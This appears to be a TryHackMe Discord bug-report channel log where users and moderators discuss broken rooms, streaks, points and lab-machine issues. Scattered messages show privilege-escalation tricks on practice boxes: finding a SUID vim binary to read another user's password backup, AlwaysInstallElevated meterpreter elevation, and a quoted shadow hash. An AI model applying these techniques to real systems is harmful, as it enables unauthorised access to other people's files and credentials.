#site-bugs

I already pinged Skidy

Yaa ..

Should I test the forum ? But this will make more useless threads I don't think admin would want that ...

Nah, just wait for Skidy to take a look

RP:PSEmpire needs to be updated in order to include connecting the database Empire cannot start without connecting the database

https://tryhackme.com/thread/5eb89975f6b800761638fe72
@shrewd marsh Fixed

Its a bug I didn't think about

I'll fix tomorrow:)

But the post is fixed for now

Ahh, the images are kinda messed up

Can you please delete it @frosty cape .

Made a request through Add Writeup

Also this thread looks owful 😦

Deleted:)

Thanks 🙂

Hi all, there is a bug in the https://tryhackme.com/room/bof1 room, Tasks 8 & 9 cannot be completed, how can I report this in order to be fixed?

It's been reported before.

wget 10.10.210.60/kali-linux-2020.1b-installer-amd64.iso
my Download speed over ovpn : 111KB/s
wget 3.249.136.48/kali-linux-2020.1b-installer-amd64.iso
My download Speed without ovpn : 3.5Mb/s
i hope someone explain me
this is THM Kali machine i can access over ovpn and internet but speed not same @frosty cape

Answered in #site-support

introtox8664, Task 2, Quad Word q 8 is twice in the table

@sly raft this one's yours I think?

Found other typos, i'll rather send you everything a once

Feel free to DM me @sullen vessel :))

https://tryhackme.com/room/webgoat is broke

doesn't spawn the webserver

doesn't spawn the webserver
@spiral flame

I left it for an hour

No webserver on 8000

@frosty cape If it's not broken, it's not fully working

Did do do :8000/WebGoat?

8000:/ returned nothing

But

:8000/WebGoat did

Works for me!

I terminated it now

But the port did not open @frosty cape

Weird

Let me terminate and redeploy

I done the same, had it up for 15 minutes and nothing on port 8000

toolrus, "What version of Apache-Coyote is this service using?" should be 7.0.88 and not 1.1. Apache-Coyote/1.1 only means it's using HTTP 1.1

completed all yet its not completed 🙂

https://tryhackme.com/room/rpnmap
Task 3 #4
When scanning with nmap -sV the service version I got is 7.6p1
While the answer is still in format 6.6.1p1

@visual oasis Web Fundamentals track? Have you completed 100% of the rooms? Up top of the room it shows your completion %

no not all but that part Idid

I completed the security tools part of web fundamentals

Oh yeah I see what you mean

🙂

Have you refreshed the page?

yup

it's not that I care

just making the owners/admins aware

@visual oasis Burp suite, there's a task that got added

oh hey

foudn it

ty

how you get the 7 day streak badge? (i had 20 day in a row on the site doing rooms and don't have it)

i think it was freshly added

aa ok thank you

Hi im trying to do WebAppSec 101 room and in 4.4 question there is some brute fource, I found a user and when I trying to log into there is error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax ....

is that proper behaviour?

Yes

yup it was the case

website is very slow

@frosty cape site ded again btw

oh i thought my internet is slow so i just set my whole Family's internet speed to 100KB each..

is only my case , or the platform is experimenting a big delay in charging ? and send me this message "Down for development"

@covert kernel #announcements

ok @spiral flame thanks man

seems the problem is in whole platform

i received this page when i tried to download my access file again (after change server)

Yes that's what the announcement says

ok 🙂 thanks again

hey

with davctf im getting an undefined pop up after the user.txt flag

@pearl fable Platform is having issues

oh, ok. Both flags are giving me the same alert. I will wait a while then. Thank you

@pearl fable #announcements for more info

thanks!!

Hey guys, I have a 42 days streak on tryhackme but it appears as 0

Streaks were just pushed today

@frosty cape Any chance of doing that retroactively?

Unfortunately, streaks start from today. I could determine users streaks, but as its a trial, I wasn't sure if its worth it

@novel carbon Dm me your THM username and I can give you your 42 day streak

ok thx Skidy

skidy pls can have my streak too?

Yea lol. I have 19 I think. 😛

Opened a can there 😛

lol

Opened a can there 😛
@topaz venture aha I did indeed

Why not

DM me

If you want your streak

if I get more than 10, I'll create a script to do it

@frosty cape Can I DM too?

bot borked? Only giving out subscriber role

it doesn't have the bug hunter role iirc

has done before

give me streak @frosty cape

tweetyctf, the cronjob is definitely not running every 5 minutes

^- this guy is waiting patiently

DM me if you want me to add streaks please:)

Streak on the top left of the profile is not the same than the one of the widget "Yearly Activity" (off by one)

Really?

Its not for me?

Whats your profile?

THM Kali not initial

@worldly pagoda what do you mean?

i mean this

it is initialising

48%

but i waiting about 10 mins not happen

then terminate the machine and deploy again

and refresh the page also

not help exactly my Percentage is -13492%

found a fun one...

hoovering over the users makes Access light up green 😄

Feature not a bug 😄

yeah it does 😆

There was points decrease right?

yes

my kali vm seems to be quite laggy and forces me to reconnect quite often just over the past week, is there a fix i could do on my end?

please fix your machines they are laging

@sinful relic what is lagging?

i don’t have any issues

my kali vm seems to be quite laggy and forces me to reconnect quite often just over the past week, is there a fix i could do on my end?
@topaz sorrel @sinful relic What countries are you in? -- I'm working on adding "in-browser" servers in the US and AU to speed it up

@frosty cape im from India

why i see Access in Browser for THM Kali in 6021s ?

It's a bit of a known bug - Ctrl + F5 your browser and if it is still present, terminate and redeploy the instance @worldly pagoda 🙂

i did but not helped should i wait 5000s to view on my Browser

Nope, can you view the developer console of your browser? see if there are any errors?

A screen shot might be a bit nicer ^^

Yes

Mhm thanks! I can't see anything obious. Sorry for the ping @frosty cape but this is your sorta thing, is there anything troubleshoot wise I'm missing?

why i see Access in Browser for THM Kali in 6021s ?

redeploy and force refresh hasn't worked

Try incognito mode in your chrome browser perhaps? @worldly pagoda

i did but not helped @topaz venture

Mhm interesting. Thanks for giving it a go. Hopefully Skidy will be able to help out when he gets a chance 🙂 I've pinged him so he'll see it as and when he can ^^

Thanks for take your time

It looks like you've extended it rather then terminating - is that right?

yes

i also Terminating before but same

Ah okay, thanks for clarifying 🙂

Just wanted to double check x)

🙂

Thanks for take your time
@worldly pagoda Hi there - can we diagnose this problem together? When you're around, please let me know:)

@frosty cape sorry for delay, i'm from UK

And it was lagging for you?

it is lagging 8/10 uses, sometimes disconnecting me

When it lags again for you, please @ me so I can see what the issue is.

Thanks Skidy!

no problem

@covert kernel #room-help

should i move this question to community-help? @spiral flame

@covert kernel That was the idea.

ok ok i will delete here then sorry :c

encoding issue for < ?

webfundamentals: task 5: step #2

No, that's just the html entity for < (less than sign), HTML is weird with things like the opening angle bracket(due to how HTML is written)

@unkempt herald It's a bug with the platform ye, I can't fix it in the room

Skidy's XSS filtering

Is a problem

It's also our fault

We didn't XSS that

I can't remember, was it the answer field or the hints we XXSd?

It was one of them

answer field was for you

Pretty sure it was all tightened up after that though

Yeah it was the answer field

i had the room issues

xD

well might as well share something you guys can fix then

I love when my TLS sings.

learnburp room

@frosty cape plz fix

@unkempt herald We can only fix rooms that we created

webfundamentals was me

I'll check that task tho

I say "you guys" as a collective entity. IDK who is responsible for what. I'm a scrub.

Anything created by "TryHackMe" is the admins

A lot of the other larger rooms come from the mod team though

Ah I see. Author is "ben [ADMIN]"

singing

mr.robot room is broken

first known issues

2nd machine after restart doesnt work

blocked ports

@reef prawn Not broken

Chances are it's VPN issues

I have vpn connection

The room is not broken

User error != bug plz

Someone suffering from problems with the WebAppSec 101 room?

Yeah, it takes a minute for the box to start

http://puu.sh/FJzcQ/87e1bbcfd9.jpg

new room.

refreshing gives the same result

@covert kernel

Huh?

What's the issue

@spiral flame

It's meant to be the same token

@covert kernel It goes off the page

Yeah

There's nothing I can do about that

Jwt tokens are long

And to keep it distinct from the other text on the page I kept it in code blocks

Well blame skidy then

One character off with JWT exploits will mess everything up

So I decided to take the style hit for more practicality

^

But if @frosty cape could update the CSS so it still looked good it'd be great

trust me,

<3

Lol

you'll love jwt

New room ZTH obscure web vulns. Task 4

Oh no it's already staryed

kekw

lol

oups

😛

Skidy plz

🤣

We doing Pars' mental age here?

I know input validation ruins the fun

But at least do it clientside

Because I will break your statistics

Hi. Im trying to do Google Dorking room. And there is question: What "Page Score" does the Domain receive out of 100? Is there any possibility tha score changed?

I think the answer is simple

but is not valid

@weak vessel No, it won't have changed

Read the answer format

And add /100 to the end of your score because it's out of 100

realy?

😄

thanks

box Plethora, JuiceShop's code execution using SSTI does not work on THM's instance (the docker container is broken in some way?)

@sullen vessel It's a known issue with JuiceShop and docker

Get the flag by rooting the host 😉

yep, on my way

@orchid remnant -5!

You have the gall

@covert kernel Sooo, one of my answers doesn't work and I'm sure it's right

Bet@spiral flame

What's up

@covert kernel It's the same as 0day, and I think I know why.

i have already answered every question in the RP nessus room, and when i refresh the page, the question appear like i dont answer it

You might want to add the other bit

About how you can't answer because it says you've already answered

is the same msg for every question

@frosty cape pls

@ornate onyx leave and rejoin the room, it won't reset your answers

already done, 30 min ago

having all the questions answered the color of the task still red, and dont count to me like im finish the room

@frosty cape pls
@spiral flame plz what?

They can't complete the room

The page has bugged

basically, they answered all the questions but the frontend doesn't accept that properly?

And the room doesn't complete

having all the questions answered the color of the task still red, and dont count to me like im finish the room
@ornate onyx Whats your THM username?

& ty James for the @

Eventually I'll put a detailed message when tagging you

I can read a few messages up, but sometimes still don't get the context of what's going on.

my username is 3stripes

@frosty cape Hi , sorry for delay

REMOTE TRYHACKME ask me Username and password for THM Kali

Need to submit a bug.

@frosty cape Sorry to ping, but I am uncertain about the severity of this bug.

Streaks still seem a bit iffy? I've lost my streak - even shows as my profile as being reset.

even following / being in BST timezone

Today should be my 7th day

submit any bugs to hello@tryhackme.com

so even tho site is down for development

i can still access it if i refresh few times

its not critical but its bug smh

1 more bug is when site is down for development

you can still access rooms

as shown right here

these aren't bugs 🙂

^

one of the servers is down

behind the load balancer

and the rest are still up

oh

okay

which is why you can still access rooms and it still appears

and what about browsing the site at all

like i can still access pages and stuff

even tho it says its down for development

also not a bug because those requests are being routed to different web servers

okay

ty for explaining tho 😹

probably mentioned already but typo in the new room:
"Learn and practice exploiting a range of unique web vulnerabilities such as SSTI, CSRF, JTW and XXE." should be JWT not JTW

@covert kernel lil' one for you pal :3 I can't see it being mentioned before, but if you're already aware of it then sorry for ping!

obsure web vulns badge wasn't generated on my profile

Streaks still seem a bit iffy? I've lost my streak - even shows as my profile as being reset.
@topaz venture yoyo

Hey, sorry looking back that sounds a lot more serious then it actually is haha @frosty cape

It just shows as being reset on the count next to the yearly activity

So, the streak started from when we pushed the code.

So you would not have had 7

Ah gotcha!

But looking at your yearly activity

Im going to give you your streaks:)

I would be on two today though

oh neat

thanks x)

Done: https://tryhackme.com/p/cmnatic

No worries:)

It checks the 24h from the last time you answered.

Thank you mate!

So make sure you answer before 1pm tomorrow to build up your streak aha

That'll make sense hehe

thanks for clarifying and adding that on 🙂

knockknock, #3, In the pcap file, whats the last port that needs to be "knocked"?, the site expects the anwser 8000 while the pcap and the server only opens the port 8888 after knocking 7000, 8000 and 9000

(UNKNOWN) [10.10.23.215] 8 (?) : Connection refused
root@kali:~# nc 10.10.23.215 7000
(UNKNOWN) [10.10.23.215] 7000 (afs3-fileserver) : Connection refused
root@kali:~# nc 10.10.23.215 8000
(UNKNOWN) [10.10.23.215] 8000 (?) : Connection refused
root@kali:~# nc 10.10.23.215 9000
(UNKNOWN) [10.10.23.215] 9000 (?) : Connection refused
root@kali:~# nc 10.10.23.215 8888
/XXXXX/

(UNKNOWN) [10.10.23.215] 8 (?) : Connection refused
root@kali:~# nc 10.10.23.215 7000
(UNKNOWN) [10.10.23.215] 7000 (afs3-fileserver) : Connection refused
root@kali:~# nc 10.10.23.215 8000
(UNKNOWN) [10.10.23.215] 8000 (?) : Connection refused
root@kali:~# nc 10.10.23.215 8888
(UNKNOWN) [10.10.23.215] 8888 (?) : Connection refused

I remember that happening to me too ^^

@covert kernel shouldn't it be changed to pip3 install xsrfprobe ?

since you are talking about python3

it works via pip3 and installing the module from github

up to you how you want to do it

^

🙂

pip picks it up too

but it's not working

SS?

pip3 works

i already reinstalled it

you got default pip?

mhm

hmm, alright then

it worked fine with both

alright

but maybe suggesting to install via pip3 is better

¯_(ツ)_/¯

true

@frosty cape hey, i've just opened my kali vm for the first time today, attempted to open firefox and i was disconnected

Ok

Let me take a look

no problem

I'm in the middle of scaling up the in-browser guac servers.

So I can get a good look at whats going on

It disconnected, then you reconnect right?

yeah

And hows the lag?

quite bad

What country are you from again?

The RDP doesn't go through guac right?

Uk

RDP is painfully slow for me normally, I use SSH instead

it has been fine for a week or two, then started getting choppy

See thats really weird

I'm having it work really well.

@spiral flame Can you deploy a Kali machine and see what its like for you?

RDP would of been my troubleshooting step

Yea sure

Thanks

@topaz sorrel are you using a VPN (not the THM VPN)

no i don't

Ok

@frosty cape RDP booted me out and I can't reconnect so RIP

Use the in-browser machine plz

RDP was always laggy for me too

Oh really?

Yep

Try using through the browser

Browser is doing quite well

Still not fast

Mind screen recording it?

@frosty cape Uploading, DM you the link?

Yes please:)

Sent

can we fix the upload bug, please?

Fix will come out by the end of the week :))

It's a very busy time :))

Hi. Is there any bug in juice shop?

Change button is always disabled

refresh

refreshed, changed browser

still the same

change from disabled to enabled?

is that a part of challange?

Find out.

There's a LOT of material on juiceshop

I just tought is a bug

there is a difference between security bugs and ui bugs ...

@weak vessel Maybe you need to get the admin email right before it'll let you

I've already know admin email

Research it

juice shop change admin password

Common Linux Privilege Escalation: Task 5

@vernal dragon

@frosty cape

false alert, i'm dumb (sorry)

call off the hounds! @spiral flame

poor hounds

(it's because some rooms have a public IP so I was trying to connect to it thinking it was the kali vm…)

wat

Not really a big issue, with question input you can type letters after hitting enter for submission and it will show you typed that as the answer, and escape characters are unregistered as characters, so you can add it to your submission anywhere at anytime and it will still be right

If you refresh, it will load the correct answer

@unkempt herald @spiral flame Fixed 🙂

Accessibility issue: Pressing the 'enter' key will not submit an answer in a room

@little scarab It does.

Weird, for me it doesn't

Than it's my fault 😒

I have a bypass for that issue, just hit the button

"Accessibility" @tired obsidian 😜

@spiral flame It doesn't, are you sure pressing 'enter' will submit an answer?

Yes

I used it earlier today

Which browser did you use? I'm using Chrome 81 and it's sadly not working

Chrome

lemme check version

Also 81

On Windows

🧐 weird

Tried multiple browsers on Mac OS Catalina and I cannot submit an answer without clicking the button. Tried most default keys

MacOS is bad for browser stuff

Does things weird

Even outside of safari, weird stuff happens

It shouldn't

It works on Windows and Linux

That's 99% of people covered

It probably works for others on mac

Now you're guessing 😛

Let's take this discussion elsewhere and leave the bug tip for the people responsible for the development of the app

I've just asked the... 1 other person I know that uses THM on a mac

I filter the bug reports as a mod

Okay so let me summarise this: You have just checked on Windows Chrome v81 if submitting an answer with the enter key works. And it works. Then you checked if it works on Linux and it did. Then you have checked the user statistics of TryHackMe and found out that 99% of the users are using either Windows or Linux. After that you even asked 1 other person using mac to check if it works and it worked for him/her.

If that's true, than that's absolutely great work

But it sounds like this 'filter' is a little opinionated

I'm getting someone to check on macos

But I can confirm it works on Windows and Linux

Have a look at relative market shares

Okay thank you. I don't want to be some nitpicker or smart ass but my actual job is User Experience and front-end development and I do not recognize your statements: "Browsers on Mac OS act weird" & "Mac OS has 1% relative market share"

But hey, I'm here to learn 🤷‍♂️

@little scarab Have a look at EXIF rotation data

MacOS respects it

Nothing else does

Unless the issue can be reproduced by someone else, there's nothing that can be done

@little scarab Have a look at EXIF rotation data
@spiral flame
Heh wow, I'm a long-time user and never experienced that problem. Good to know 😮 thanks

That's indeed 'weird' behaviour haha

Undefined behaviour, I'm sure

I'll ask if we strip-off EXIF data for user uploaded content tomorrow. Because clearly it's important to do so. Damn

But I'm glad you're taking the time to check if the submission issue on Mac OS is reproducible @spiral flame . I would love that feature to work again

I know exactly 1 other person who uses THM and has a mac, so I've asked.

Flag 5 on Task 4 of Hackback2019 doesn't seem to work

webgramming task 9 is a copy of https://github.com/SniperOJ/Jeopardy-Writeups/blob/master/web/web50-as-fast-as-you-can/index.php but i don't see any mention of the original author. Also, the task is broken as it seems that $_SESSION['random_string_create_time'] is never set (I get you cost [1589403787599] msec, which is the current timestamp and not the difference between the timestamp of the second request minus the timestamp of the first request). The task 3 was also never solved except by the author, is it possible to confirm that they were tested?

@final raft Jurassic park? Known issue

Yes, ah thank you

@sullen vessel That room was released before rooms were reviewed

jurassic has its own separate room, hackback should be removed no? 👀

No

do you happen to have access to the ova of webgramming @spiral flame? it would really like to know if they are solvable or just bugged

Please remember, we're discord mods

My power on the site extends to rooms I created, or rooms currently in the review queue

ok, i'll try to find a way to contact the author. thanks :)

ultratech1, task2, #5 The software using the port 8080 is a REST api, -> the server does not expose the port 8080, i guess the question should mention the port 31331 instead

Streaks seem a tad buggy, how are they updated?

Streaks seem a tad buggy, how are they updated?
@urban flame Its 24 hours from the last time you answered.

Ah okay makes sense

Deploy your own Kali Machine (2020 Version) THM kali

Can't SSH?

all times i can't get in browser

You have been disconnected.

Normally means you loaded it somewhere else

its open 1sec and i see disconnected and no i not opened it another browser

i can connect SSH , but Guacamole disconnect me all times

i have this issue with [Task 4] In-browser Kali machine (Old)

[Task 2] Deploy your own Kali Machine (2020 Version) In-Browser is ok

What is Different between Task 2 and Task4 in THM Kali Machine ?

Kali versions

Task 4 has massive improvements, but wont come into effect into I push next

Task for is the LXDE desktop environment

Hi @frosty cape , i always Disconnect from Task4 its okey ?

I've fixed this, but it will not work live until I push my latest codebase.

Inbrowser machines are 100% more reliable, I just need to push the code.

Adding some stuff before pushing

In browser was faster than RDP in some regards

That was nice

Its going to be even better after this push, excited to push this tbh

Im not getting this verification email. dont know if it just takes a while but ive tried for about 45 mins now with a couple diff emails.

@frosty cape ?

and im tryina get a subscription

Please check your spam folder.

i have you think id be asking?

Right ok.

DM me your email and I can check, but looking at our dashboard, we have no pending outgoing emails.

okay i did

On the juiceshop machine the links on the scoreboard are broken

Sometimes that happens, go to the dashboard and use the resend link

Which resend link?

I am talking about the hyperlinks behind the hints
For example: https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/part2/sensitive-data-exposure.html#access-a-confidential-document

None of the flags work on Jigsaw

@tired obsidian Jigsaw 1 or Jigsaw 2?

1

The flags work

Bear in mind, THM only needs the flag

They don't need flagX{}

Yeah I just figured that out

The Corp machine's Administrator password is expired, and cant be changed. However I was able to read Administrator flag without privesc. Is that left intentionally or a wrong permission?

@fringe girder Reading it is the privesc

I mean I was able to read Administrator flag without privesc from the 2nd user.

Oh, not sure

How do I submit the bug?

Right here

We've taken note of it

But it's weird

I tried to do that during testing

Got permission denied

Wonder why it's working for you

Not sure me either

Could you reset the box and try again

I tried 2 times and still works.

Really weird

You don't have to escalate on that box

the priv esc from what I remember is token impersonation unless I'm mistaken

I thought it was unattended upgrades?

Still works same unintended way. I just checked it.

Shows me UAC but I can click continue and im in admin directory

Yeah

Iron corp or corp? @fringe girder @covert kernel

They're two different rooms

One is spookysec, one is seth

iron corp I can discuss to some detail, corp I have no clue

Corp was unattended upgrades privesc

It is Corp.

@covert kernel Can you amend your submission plz

Submission amended

@torpid shoal Can you confirm this is a mistake on your room according to these posts ? https://discordapp.com/channels/521382216299839518/522158539129618453/710597826979037314

@frosty cape https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/

Not a bug

It gives you an elevated meterpreter because the msi runs as admin due to AlwaysInstallElevated

yes, I have the elevated meterpreter

but user is not in the Admin group

Adding a user is a slightly different payload

Looks like that part might have been missed

May be I misunderstand because of my poor English level ^^

It is missing a payload that adds the user as an administrator, which that article highlights

Yes I agree, I understand why I'm elevated but not the admin group part

okay

@autumn wave Any chance you could highlight this to tcm when they're around?

Thanks for your answer/help/artcile @spiral flame

Yea I'll say something to him.

Cheers

My bad

Its from the old way I had it

Which was a CMD payload

3 just needs to be omitted

Will add that to the todo list

Ty

@frosty cape Thanks for catching that

There is a bug with streaks, I'm uploading the fix (along with a whole host of other things) in the next hour.

@topaz venture "anon" now changed to "anonymous" on the FTP subsection for networkservices. Hopefully that will resolve the issues related to the login 🙂

Refreshing fixes it but still

bug fixed in the privesc arena, thanks again

JokerCTF has no lxc containers installed, I can see one sometimes but disapears before I can start it, other time it just doens't show up at all.

I've restarted the room 5 times now

https://tryhackme.com/room/bebop task 2 question 1 in hints nice words "are there are" 😂

its not a bug but you get the point lol

@tribal knoll could you fix that? ^

it's your room, right?

@topaz venture "anon" now changed to "anonymous" on the FTP subsection for networkservices. Hopefully that will resolve the issues related to the login 🙂
@vernal dragon Thanks Polo! Much appreciated buddy :3

Nah that one is mine, was my first so was expecting something like this to pop up eventually, gimme 30 mons

i'm sorry for that ^^

yah sry for that dan @tribal knoll

not a problem

Ah, I can't actually edit that

I'll let Ashu know

Flag 1 of task 4 of hackback2019( https://tryhackme.com/room/hackback2019 ) does not seem to work, the flag works in the standalone version of the box( https://tryhackme.com/room/jurassicpark )

Yet looking at the leaderboard for hackback2019 people seemed to have managed to answer the question correctly?

the first flag is different

you need to get it from the hackback box

no idea why they are different

I submitted the flag from the hackback machine

@short jackal Looking at the leaderboard you have manged to complete the task, can I pm you to check if my flag is correct?

sure

@rugged ermine was the hackback jurrassicpark vm copied to be used on the jurrasic park room? they were a tad different but now they're essentially the same

Yeah it's the same VM

When we had less resources as we started several of our initial VMs were reused for competitions prior to a bulk release

@rugged ermine Can you please fix(read the last 6-7 comments please) 🙂

I'll see what I can do

There's another thing on jpark we're fixing

Just curious, for some reason I didn't get the extra points for Borderlands (I'm assuming this is due to the points update) I did Borderlands 2+ months ago.

Hello guys are you there?

@covert kernel ...

I have a quick question. I accidentally logged out and now in any machine (in my kali or other machine) i got a prompt "REMOTE TRYHACKME". Which password and login i must type?

@covert kernel terminate and redeploy

i tried but still the same 😦 ..... so.. once again?

Sure.

ok, thank You guys.. have a nice evening

hmmm still the same 😦

another computer and another browser

Skidy is gone for a few days

Nothing we can do

ok, thanks, i try with another machine and connect from my personal computer kali linux

Bebop points glitched. Just done full clear and got 56. While most others have 210

Before walkthroughs were worth less points

The points changes don't count retroactively

James, I'm aware. This still needs to be fixed via a script however

The retroactive points thing is a known issue

I've brought it up with Skidy a number of times

How the points system work? optional have only 8 points for each solved task?

room skynet

@fresh tide Walkthroughs are worth 8pts/q

Skidy's busy so I don't know what we can do about it if it's broken

I don't envy the guy when comes back

i think this should be fixed as JWT

What about the widely known JTW bug?

i can't paste from my machine to Optimised THM Kali

Is TryHackMe limited to one IP? (can't remember if I read that on here or somewhere else), but either way, I realized when I reset my password it didn't log me out of my other computer, is this intentional or?

Probably an oversight with session cookies

@feral flame Shouldn't be, no. I'm usually signed in on a bunch of different browsers/machines

Right, sleepy talk, meant to say IP

Aha -- fair. Every chance I misread too 😛
Yeah, that does seem like a bit of a security flaw

Skidy is away just now, and I reckon he's received enough pings already, so I won't ping him just now about it

Worth bringing up when he's back though 🙂

In room "Blaster", after RDPing to the machine the IE history is empty when it should contain a search for a CVE

@pseudo talon It's not retro.

It's only mostly retro

@spiral flame What do you mean?

@fresh tide Walkthroughs are worth 8pts/q
@spiral flame i did the same questions but me and everyone else in the room got 30 points each question

Guys.. i have a problem with my vpn connection

i regenerated my config file and download.

Initialization sequence complete.

but in ifconfig tun0

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
RX packets 76329 bytes 65909155 (62.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 80045 bytes 15756215 (15.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

ok restart helps 🙂

i found the solution.. just after kali upgrade it created just a new tunels tun1 tun2 tun3 etc

hi

hey everyone

hey everyone
@brave plaza hi

Can someone tell me why this is wrong? Its indexing...

I think is a bug...

Close @strong carbon, the key term the answer is looking for is throughout the text for that task 🙂

didnt get your point

@strong carbon it's not a bug, your answer isn't right

got you.

I will check again.

Thank you.

Hey, I was on streakfor5 days, Today i logged in again & I completed 1 room. but my streak has been reset. Looks like a bug

Streaks are crazy buggy

I'm having the same issue ~ after the 5th streak it reset.

@covert kernel THM Trick to not let you get 5% off Swag.

the room "zthlinux" called Learn Linux got 1 bugged question. Task 10 the first question it asking for a answer but you cant fill it in.

@indigo hare It's not bugged

Or at least

It's not the room

refresh the page

it says "no answer needed"

i cant fill something in

You don't need an answer

So click submit or whatever

@covert kernel

fix it

but it asks a question so i want to fill something in 😄

@indigo hare Just click the button

i already did but just wanted to mention it, it feels wrong. thx

DM me your answer and I can tell you if you're right

What did I do this time@spiral flame

Task 10 q1

you deleted the answer, or it never asked for one

Yeah?

Huh

@covert kernel

fixit fixit fixit

Oh weitd

Wonder how that happened

Para fixed@spiral flame

@indigo hare 👍

https://tenor.com/view/pedro-monkey-puppet-meme-awkward-gif-15268759

why some times THM Kali ask me Remote Username Password for Guacamole ? and whats that ? like i logout from THM Kali in Browser

https://tryhackme.com/room/commonlinuxprivesc

This room at task 8

It required msfvenom to answer the question

but the machine doesnt have msfvenom installed

@spare timber Not a bug, run msfvenom on your host machine

@spare timber Google, your 24x7 assistant can answer this.

@mighty night What does Google have to do with this? You're supposed to run the command on your host machine.
The boxes don't have internet access so you can not install msfvenom if that is what you're thinking.

@median sapphire Oh, Sorry I didn't see that. I thought that he is running "msfvenom" in his machine. But now I saw that he is running it on target machine.

@median sapphire thanks, I was thinking host machine as the deployed machine. My bad english sorry

Hello everybody, in the room https://tryhackme.com/room/rfirmware (room created in 2019), the firmware download has been updated by lynksys on 5/1/2020 so it's impossible to do the room because CRC or creation date changed (Task2: #6,#7,#8,#9,#10 impacted)

I have a confirmation that the file is no longer available on their website so This room is impossible to complete.

Hello, I'm having an issue with Anthem room, it's freezing after 1 hour of usage, even after extending the time, still freezes

won't even respond to pings anymore after 1 hour

I am having an issue with the room blue, it's at 100% but its not showing as complete?

Same as Dalist-. The machine automatically shoots down. ||I was connected through RDP and the Shutting Down screen appeared||

it might be something with windows boxes i think

Hi, the Metasploit room, task 4, #3 has a typo in the correct answer. The accepted answer is auxilliary, correct spelling should be auxiliary.

@frosty cape Thanks for letting me know, I'll go update the tasks!

I'll try to get a mirror of it this time so it wont be an issue in the future.

@tired obsidian that was just to avoid the answer format giving it away

I noticed because it was used in further questions, that's why I deleted it

@hazy stratus Or else you can make it available on download (with the download button)

I'm not comfortable hosting it on TryHackMe because its Linksys IP

Okok

id rather have it on github, there's a null chance GitHub will pull it

You could just put it up on mediafire, dropbox, google drive, onedrive...

Again, IP rights

And there's bound to be another copy of it online

Doesn't make it ok

To be fair I don't know about the context of this, all I know is there's a missing file we need

kekw

i think i found a bug in the basic pentest machine.
so when i cat the /<user>/flag.txt i get permission denied. but when i vim it, it opens.

as I instinctively use vim i kinda opened the flag without any privesc and was very confused.

@ebon oyster Is Vim SUID?

did the find -perm 4000 but didn't yield any result. I thought that too.

should i do that one more time to confirm? @spiral flame

find / -perm /4000 2>/dev/null

/4000 is different to 4000

yeah i started from / but i may be wrong let me just quickly verify.

jan@basic2:~$ find / -perm 4000 -type f 2> /dev/null
jan@basic2:~$ vim /home/kay/pass.bak
-opens-

@spiral flame

ls -lah /home/kay/pass.bak

oh ohk.. /4000 gives

jan@basic2:/home/kay$ find / -perm /4000 -type f 2> /dev/null | grep vim
/usr/bin/vim.basic

Yep

So VIM is suid

yeah.. but never saw any of the articles with /4000 i will read about it. thanks

You were looking for permissions that were exactly 4000 I think

yeah got it. thanks @spiral flame

sir the room has a problem

https://tryhackme.com/room/25daysofchristmas

theres only one port open

111/tcp open rpcbind

but the task 6 asks us to visit the machine with 3000 port open

It does not have a problem

Deploy the correct VM

Give it 5+ mins to load the service

ok i'will wait

Thanks it seems to be working

now

linux challenges room is vip but appears in hacktivity free only and when clicked it added to "my rooms" + redirecting to why subscribe page, bug ?

it seems to have happened to quite a few people

it wants to be free

it wants to be replaced.

lol

badges are not retro-actively awarded. eg. i finished zthobscurewebvulns before the badge was created, and i did not obtain it

badges are not retro-actively awarded. eg. i finished zthobscurewebvulns before the badge was created, and i did not obtain it
@sullen vessel Whats your THM username?

swapgs

swapgs
@sullen vessel There we go: https://tryhackme.com/p/swapgs

@frosty cape wb

ty

\o thanks

When tasks are deleted from a room the task number order does not correct itself

Ah yes, thats annoying.

I'll fix that, for the moment, switch the tasks round and it will update.

Switching the tasks around are also buggy say I want to swap two different tasks that are right next to each other it moves around all of the tasks seemingly randomly and I have to fiddle with it for a couple minutes for the tasks to be where I want them to be

I just fixed the tasks not being re-ordered locally - will be made live in our next code push

Let me look into the buggy task swapping too whilst I am at it.

Create task from tasks view when

when I get time / have a smaller to-do list :)

Im fairly new to THM (month or so). And finished the Learning Path "Complete beginner". However the Web Application Security part is colored red (but all rooms have been completed (have the little green tick next to them). so the learning path is not completing .... Any chance anyone could have a look at this?

@shrewd stone Burp suite

There was a question added

It doesn't require an answer.

THANKS!!

+1 for you ;D

So when you are selecting country and when you switch your country to the one that isnt in the options and if country you typed in params is in chinese letters it doesnt display

I forgot to mention. Instead of chinese latters it displays ') or ") i dont remember im writing this from phone

This is known

My streak reset even though I completed a room/question in the last 3 days. Was about to do my next question. Is there something else I need to know about the timing?

Streaks are buggy

They're getting some fixes.

I have a weird bug to report with a room I'm creating. One of the questions asks users to extract a hash from /etc/shadow and it's in the UNIX crypt SHA-512 format, e.g. $6$350c16b54a1be3de$8vD4hy9ER4zOvQF3HXE2uZBTL3qwkv51WLVdEZf4lWIl5qrPjiOhut8ZUI0NRtqtx0y.BV/yoOyJELmr.G8hR/

However during testing someone noticed that they could submit the hash without the first $ and it was marked correct. I just experimented with it and I could submit everything beyond the final $ (i.e. 8vD4hy9ER4zOvQF3HXE2uZBTL3qwkv51WLVdEZf4lWIl5qrPjiOhut8ZUI0NRtqtx0y.BV/yoOyJELmr.G8hR/) and have the answer marked as correct.

Trimming characters from the end of the string doesn't have the same effect. I'm wondering if it's something to do with the $ specifically? Only thing that springs to mind is some regex weirdness in the check maybe?

I think it's the regex for the answer

@heady cosmos You're correct, the regex allows some tolerance in the answer.

It's uh

Annoying

And we've asked for control over it

ah I see, yeah that explains some things then. Would be nice to have to have exact answers or at least know the tolerances but I can work with this 🙂

hello i'm new here

@west wolf Hi, do you have a bug to report?

what's happening can any one explain it?

no

Then head over to #general please

ok sorry for that

Badge hasn't been added to my profile. been like this for over a week now.

im experiencing problems with koth

it is saying 404 it is gone into a matrix

It happens

why

IDK

Badge hasn't been added to my profile. been like this for over a week now.
@rare swallow https://tryhackme.com/p/Chevalier (added)

